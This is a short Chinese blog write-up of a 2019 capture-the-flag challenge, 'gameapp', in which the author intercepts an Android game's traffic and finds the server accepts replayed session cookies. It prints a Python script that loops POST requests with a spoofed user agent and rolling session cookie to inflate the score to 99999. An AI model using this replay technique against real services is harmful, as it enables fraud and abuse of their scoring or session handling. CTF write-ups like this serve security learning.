keac's Bolg.

数字经济”云安全共测大赛初赛 gameapp

字数统计: 247阅读时长: 1 min
2019/09/20 Share

打开网页,看到你能得到99999分吗

看到还有个附件 下载下来为一个apk文件

在夜神模拟器里面安装

打开app

玩了下就输了。。。

考虑了一下,达到99999分,我这样手残党是玩不动的

夜神模拟器中修改代理
再点开请求

打爆一只飞机 发了个请求

打爆第二只飞机 发了个请求

分析session里面的 jwt

首先尝试了破解jwt密匙,但是跑了好久都没跑出来

然后看了下把session复制过来重新发,可以持续加分数

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
url = 'http://121.40.219.183:9999/score/'

body = "OAJZiuZqnBwNco1SD+XLYENOq1fnZSecbtn4aReWWJGwNarE2XqwabMdBJAwISqDOkfP4KiS5ULlIjeDUZppTcvFMMnopd2VU7rAmFMv/rsfZg/Hc0qgNQ2D9NwAODle8JXbREA4Z/nkQYvfwiRJ+yZf51YsAty9GJSwozRbcfw="
cookie = "session=eyJwbGF5ZXIiOiJhZG1pbiIsInNjb3JlIjoxMTIwMjd9.XYRfFw.y7P5sCLQOiLmOu9sNKfQTc0Gdqk; HttpOnly; Path=/"
for i in range(1, 99999):
print(cookie)
print(i)
headers = {'User-Agent' : 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; SM-G955F Build/JLS36C)', 'Cookie': cookie}
response = requests.post(url, data = body, headers = headers)
cookie = response.headers['Set-Cookie']
#print(cookie)
print(response.text)

成功跑出flag

CATALOG